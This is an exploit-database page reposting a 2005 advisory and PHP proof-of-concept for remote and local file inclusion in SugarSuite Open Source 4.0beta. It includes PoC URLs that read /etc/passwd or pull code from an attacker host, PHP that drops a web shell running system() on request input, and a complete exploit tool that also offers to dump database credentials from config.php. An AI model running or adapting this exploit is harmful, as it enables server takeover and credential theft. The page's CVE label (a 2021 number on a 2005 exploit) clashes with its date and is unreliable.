SugarSuite Open Source <= 4.0beta Remote code execution
CVE
Category
Price
Severity
CVE-2021-41107
CWE-94
Not specified
Critical
Author
Risk
Exploitation Type
Date
Not specified
Critical
Remote
2005-12-14
CPE
cpe:cpe:/a:sugarcrm:sugar_versions:4.0beta
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005120020 Below is a copy:SugarSuite Open Source <= 4.0beta Remote code execution
software:
site: http://www.sugarcrm.com/crm/
i) vulnerable code in acceptDecline.php at lines 81-82
...
$bean = $beanList[$_REQUEST['module']];
require_once($beanFiles[$bean]);
...
if register_globals on & allow_url_fopen on in php.ini, remote code inclusion, poc:
http://[target]/[path_to_sugar]/acceptDecline.php?beanFiles[1]=http://[r
emote_location]/index.html&beanList[1]=1&module=1
if register_globals on, local inclusion, poc
http://[target]/[path_to_sugar]/acceptDecline.php?beanFiles[1]=../../../
../../../../../etc/passwd&beanList[1]=1&module=1
http://[target]/[path_to_sugar]/acceptDecline.php?beanFiles[1]=../../../
../../../../../../script.php&beanList[1]=1&module=1
at [remote_location], in index.html you have this code:
<?php
$fp=fopen("suntzu.php","w");
fputs($fp,"<? echo 'Hi Master';error_reporting(0);ini_set('max_execution_time',0); system($HTTP_GET_VARS[cmd]);?>");
fclose($fp);
?>
note: the file can have any extension, but not .php or any executable, it must be readable
from a browser...
now you can launch commands on target system:
http://[target]/[path_to_sugar]/suntzu.php?cmd=cat%20/etc/passwd
this is my proof of concept exploit tool:
<?php
# ---sugar_suite_40beta_xpl.php #
# #
# Sugar Suite Open Source <= 4.0 beta remote code execution #
# coded by rgod #
# site: http://rgod.altervista.org #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# Sun-Tzu:"It is a matter of life and death, a road either to safety or to #
# ruin. Hence it is a subject of inquiry which can on no account be #
# neglected." #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html><head><title>Sugar Suite Open Source <= 4.0beta remote code execution
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
Sugar Suite Open Source <= 4.0beta remote code execution</p><p class="Stile6"> a
script by rgod at <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.strip_tags($_SERVER[PHP_SELF]).'"><p><input
type="text" name="host"> <span class="Stile5">* hostname (ex:www.sitename.com)
</span></p> <p><input type="text" name="path"> <span class="Stile5">* path (ex:
/sugar/ or just / ) </span></p><p><input type="text" name="command"> <span
class="Stile5"> * specify a command ("cat config.php" to see database username &
password)</span></p><p><input type="text" name="location"><span class="Stile5">
* remote location ( ex: http://www.somesite.com/index.html) </span></p><p><input
type="text" name="port"><span class="Stile5">specify a port other than 80
( default value ) </span></p> <p> <input type="text" name="proxy"> <span
class="Stile5"> send exploit through an HTTP proxy (ip:port)</span></p> <p>
<input type="submit" name="Submit" value="go!"></p></form> </td> </tr> </table>
</body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td> </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';
function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
//next function to send packets
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.rnReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) { echo 'No response from '.htmlentities($host);
die; }
}
else
{
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
$host=$_POST[host];$path=$_POST[path];$command=$_POST[command];
$proxy=$_POST[proxy];$location=$_POST[location];$port=$_POST[port];
if (($host<>'') and ($path<>'') and ($command<>'') and ($location<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("rn","",$host);
$path=str_replace("rn","",$path);
$packet="GET ".$p."acceptDecline.php?beanFiles[1]=".urlencode($location)."&beanList[1
]=1&module=1 HTTP/1.1rn";
$packet.="User-Agent: MantraAgentrn";
$packet.="Host: ".$host.":".$port."rn";
$packet.="Connection: Closernrn";
show($packet);
sendpacketii($packet);
$packet="GET ".$p."suntzu.php?cmd=".urlencode($command)." HTTP/1.1rn";
$packet.="User-Agent: Vagabondo/2.0 MTrn";
$packet.="Host: ".$host.":".$port."rn";
$packet.="Connection: Closernrn";
show($packet);
sendpacketii($packet);
if (eregi("Hi Master",$html)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
}
else
{
echo "Note: on remote location you need this code in <br>
http:/[remote_location]/index.html :<br>";
echo nl2br(htmlentities("
<?php
$fp=fopen("suntzu.php","w");
fputs($fp,"<? echo 'Hi Master';error_reporting(0);ini_set('max_execution_time',0); system(\$HTTP_GET_VARS[cmd]);?>");
fclose($fp);
?>
"));
echo "<br>Fill * requested fields, optionally specify a proxy...";
}
?>
rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/sugar_suite_40beta.html
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum